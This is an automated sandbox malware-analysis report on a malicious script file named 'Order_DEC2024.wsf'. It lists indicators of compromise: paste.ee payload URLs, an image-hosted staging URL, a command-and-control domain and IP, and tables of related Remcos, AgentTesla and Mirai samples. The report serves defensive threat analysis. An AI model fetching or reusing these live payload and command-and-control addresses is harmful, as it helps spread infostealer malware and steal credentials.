                                                    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgXpowershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aefd.nelreports.net/api/report?cat=bingthbhv59C6.tmp.8.drfalse
                                                        high
                                                        https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv59C6.tmp.8.drfalse
                                                          high
                                                          https://analytics.paste.eewscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.nirsoft.netMSBuild.exe, 00000008.00000002.2072845831.00000000007EF000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aefd.nelreports.net/api/report?cat=bingaotakbhv59C6.tmp.8.drfalse
                                                                high
                                                                https://deff.nelreports.net/api/report?cat=msnbhv59C6.tmp.8.drfalse
                                                                  high
                                                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv59C6.tmp.8.drfalse
                                                                    high
                                                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv59C6.tmp.8.drfalse
                                                                      high
                                                                      https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv59C6.tmp.8.drfalse
                                                                        high
                                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comMSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv59C6.tmp.8.drfalse
                                                                            high
                                                                            https://www.google.comwscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv59C6.tmp.8.drfalse
                                                                                high
                                                                                http://geoplugin.net/json.gp/CMSBuild.exe, 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://maps.windows.com/windows-app-web-linkbhv59C6.tmp.8.drfalse
                                                                                    high
                                                                                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv59C6.tmp.8.drfalse
                                                                                      high
                                                                                      https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv59C6.tmp.8.drfalse
                                                                                        high
                                                                                        https://login.yahoo.com/config/loginMSBuild.exefalse
                                                                                          high
                                                                                          https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.nirsoft.net/MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1968637783.0000014909FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://paste.ee:443/d/GXRLAzW:wscript.exe, 00000000.00000003.1713716342.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712890130.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712418235.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714215563.0000013A577BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://secure.gravatar.comwscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv59C6.tmp.8.drfalse
                                                                                                        high
                                                                                                        https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgpowershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv59C6.tmp.8.drfalse
                                                                                                            high
                                                                                                            http://paste.ee/d/GXRLAwscript.exe, 00000000.00000003.1712940863.0000013A5779D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714188174.0000013A5779E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712851322.0000013A57792000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713522335.0000013A598C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714377412.0000013A57A7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714419138.0000013A59260000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713498375.0000013A57A7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv59C6.tmp.8.drfalse
                                                                                                                high
                                                                                                                https://www.office.com/bhv59C6.tmp.8.drfalse
                                                                                                                  high
                                                                                                                  https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv59C6.tmp.8.drfalse
                                                                                                                    high
                                                                                                                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv59C6.tmp.8.drfalse
                                                                                                                      high
                                                                                                                      https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv59C6.tmp.8.drfalse
                                                                                                                        high
                                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://geoplugin.net/json.gplMSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv59C6.tmp.8.drfalse
                                                                                                                              high
                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://paste.ee/:wscript.exe, 00000000.00000003.1713716342.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712890130.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712418235.0000013A577BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714215563.0000013A577BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv59C6.tmp.8.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com;wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.imvu.comMSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://aefd.nelreports.net/api/report?cat=wsbbhv59C6.tmp.8.drfalse
                                                                                                                                          high
                                                                                                                                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv59C6.tmp.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv59C6.tmp.8.drfalse
                                                                                                                                                high
                                                                                                                                                https://res.cloudinary.compowershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingaotbhv59C6.tmp.8.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv59C6.tmp.8.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv59C6.tmp.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://paste.ee/d/GXRLAi.csv8wscript.exe, 00000000.00000002.1714125091.0000013A57759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713810861.0000013A57758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://analytics.paste.ee;wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv59C6.tmp.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://aefd.nelreports.net/api/report?cat=bingrmsbhv59C6.tmp.8.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv59C6.tmp.8.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/accounts/serviceloginMSBuild.exefalse
                                                                                                                                                                    high
                                                                                                                                                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv59C6.tmp.8.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1968637783.0000014909FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv59C6.tmp.8.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv59C6.tmp.8.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv59C6.tmp.8.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://www.ebuddy.comMSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  178.237.33.50
                                                                                                                                                                                  geoplugin.netNetherlands
                                                                                                                                                                                  8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                  104.21.84.67
                                                                                                                                                                                  paste.eeUnited States
                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  160.25.73.25
                                                                                                                                                                                  lewisham1122.ddnsking.comunknown
                                                                                                                                                                                  17676GIGAINFRASoftbankBBCorpJPtrue
                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1568135
                                                                                                                                                                                  Start date and time:2024-12-04 11:08:05 +01:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 8m 20s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                  Number of analysed new started processes analysed:13
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:Order_DEC2024.wsf
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winWSF@16/8@4/3
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                  • Number of executed functions: 159
                                                                                                                                                                                  • Number of non-executed functions: 301
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .wsf
                                                                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.17.201.1, 104.17.202.1, 172.202.163.200, 199.232.210.172, 192.229.221.95, 40.69.42.241, 13.85.23.206
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, resc.cloudinary.com.cdn.cloudflare.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                  • VT rate limit hit for: Order_DEC2024.wsf
                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  05:09:01API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                                                                                                                  05:09:02API Interceptor76x Sleep call for process: powershell.exe modified
                                                                                                                                                                                  05:09:59API Interceptor5701583x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  178.237.33.50#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  7a67aa0f4b0c33b1bd9acf18ea4e96d357e8198c5eaaab2404e9f6802db3fb87_d.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  Company Profile and new order-202401127.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  aDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                  104.21.84.67nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • paste.ee/d/81FCf
                                                                                                                                                                                  Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • paste.ee/d/MQJcS
                                                                                                                                                                                  Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  • paste.ee/d/u4bvR
                                                                                                                                                                                  rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  • paste.ee/d/SDfNF
                                                                                                                                                                                  Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • paste.ee/d/enGXm
                                                                                                                                                                                  Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • paste.ee/d/wXm0Y
                                                                                                                                                                                  SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • paste.ee/d/eA3FM
                                                                                                                                                                                  dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • paste.ee/d/JZHbW
                                                                                                                                                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • paste.ee/d/kmRFs
                                                                                                                                                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  • paste.ee/d/cJo7v
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  bg.microsoft.map.fastly.netlnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                  Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                  https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                  payload8.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                  Invoice268277.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  __Official Notice 2024_2025 Compensation Adjustments and Enrollment Timelines__ 03_12_24.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  QuarantineMessage (1).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  b1.exeGet hashmaliciousPureCrypter, MicroClipBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  paste.eenr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  asegurar.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.67.187.200
                                                                                                                                                                                  Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.67.187.200
                                                                                                                                                                                  Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 172.67.187.200
                                                                                                                                                                                  asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  geoplugin.net#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  7a67aa0f4b0c33b1bd9acf18ea4e96d357e8198c5eaaab2404e9f6802db3fb87_d.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  Company Profile and new order-202401127.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  aDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  GIGAINFRASoftbankBBCorpJPx86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 219.50.182.34
                                                                                                                                                                                  teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                                  • 126.51.155.118
                                                                                                                                                                                  teste.i686.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                                                  • 126.228.43.204
                                                                                                                                                                                  teste.mips.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                                  • 126.1.4.68
                                                                                                                                                                                  teste.ppc.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                                  • 126.184.84.176
                                                                                                                                                                                  spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 219.8.229.7
                                                                                                                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 126.100.201.71
                                                                                                                                                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 202.234.102.69
                                                                                                                                                                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 126.141.198.239
                                                                                                                                                                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 126.8.21.157
                                                                                                                                                                                  ATOM86-ASATOM86NL#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  7a67aa0f4b0c33b1bd9acf18ea4e96d357e8198c5eaaab2404e9f6802db3fb87_d.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  Company Profile and new order-202401127.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  aDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  CLOUDFLARENETUSBank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
